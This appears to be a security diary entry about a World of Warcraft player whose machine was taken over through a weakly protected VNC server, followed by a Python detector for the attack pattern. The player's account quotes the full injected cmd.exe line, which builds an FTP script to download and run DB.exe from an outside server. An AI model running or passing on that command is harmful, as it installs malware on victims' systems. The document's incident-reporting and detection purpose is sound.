Last Updated: 2007-11-11 23:16:23 UTC
by Koon Yaw Tan (Version: 2)
Our reader Oscar shared with us that while he was playing World of Warcraft, he suddenly lost control of his character and saw some "strange" lines appear (injected command strings displayed within his WoW session). Below is a screenshot.
As he was also running a VNC server with a fairly easy-to-guess password, this is what he got, a couple of files:
If you have encountered a similar experience, let us know.
Lesson learnt: If you expose any services to the Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks to Oscar for sharing.
Oscar wrote back and gave us a detailed description of what happened. Here is what he said:
So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.
So I was walking back out of the hearth spot, and my character started spinning around in circles, then my character said "aaaaaaaaa"
then, what looked like code was also spoken by my character: "%systemroot%\system32\cmd.exe and then /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit" So, this seemed curious, since I wasn't even on a Windows platform, so I manually logged into the FTP server, did an mget * and thought the SANS folks would be interested in these files.
Now, how did they get in? My guess here is that I had just installed the latest and greatest version of my favorite company's OS, and I turned on a feature called Screen Sharing, and also X'd the option to allow VNC users to log on with a password. Well, the password I picked was pretty guessable. When I logged into the previously mentioned FTP site, a program there was called vnckiller.exe. So I would assume that's how they got in. Lesson for the Day: Even if you're turning on a feature for testing purposes, don't choose an easy password, as most likely, you'll forget to turn off this feature, and be rooted. Thank goodness I wasn't
A question for our readers: has anybody seen this happen to their session in WoW or any other virtual world simulation?
Edwin wrote to us and said that he has seen the same problem before. He pointed to http://www.securityfocus.com/archive/1/433994/30/0/threaded for details on the exploit.
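The command string in Oscar's report writes an FTP script line by line with echo, runs it with ftp -s:, and then executes the file the script downloaded. As an added example (not part of the original diary), the Python code below flags that pattern in a logged command line; the function names and both sample lines are constructed for illustration, with a placeholder host and credentials.

```python
import re

# Constructed sample command lines (placeholders, not taken from a real log).
SAMPLES = [
    r'%systemroot%\system32\cmd.exe /c echo open ftp.example.invalid 21 >> ik '
    r'&echo user USER PASS >> ik &echo binary >> ik &echo get DB.exe >> ik '
    r'&echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit',
    r'cmd.exe /c echo build finished >> build.log & type build.log',
]

# "echo <text> >> <file>" anywhere in a segment (the first one follows cmd.exe /c).
ECHO_RE = re.compile(r'\becho\s+(.*?)\s*>>?\s*(\S+)\s*$', re.I)
# "ftp ... -s:<file>" runs the FTP commands stored in <file>.
FTP_RE = re.compile(r'^ftp(?:\.exe)?\b.*?-s:(\S+)', re.I)


def _args(lines, verb):
    """First argument of every script line that starts with the given FTP verb."""
    return [l.split()[1] for l in lines
            if l.lower().startswith(verb + ' ') and len(l.split()) > 1]


def analyze(cmdline):
    """Return findings when cmdline builds an FTP script with echo and runs it
    with ftp -s:, otherwise None. 'executed' lists downloaded files that the
    same command line then starts."""
    scripts = {}   # script file name -> lines echoed into it
    result = None
    for part in (p.strip() for p in cmdline.split('&')):
        m = ECHO_RE.search(part)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_RE.match(part)
        if m and m.group(1).lower() in scripts:
            lines = scripts[m.group(1).lower()]
            result = {'script': lines, 'hosts': _args(lines, 'open'),
                      'fetched': _args(lines, 'get'), 'executed': []}
            continue
        words = part.split()
        if result and words:
            if words[0].lower() in [f.lower() for f in result['fetched']]:
                result['executed'].append(words[0])
    return result


if __name__ == '__main__':
    for line in SAMPLES:
        print(analyze(line))
```

A non-empty `executed` list is the high-confidence signal: a file fetched by the generated FTP script is launched in the same command chain.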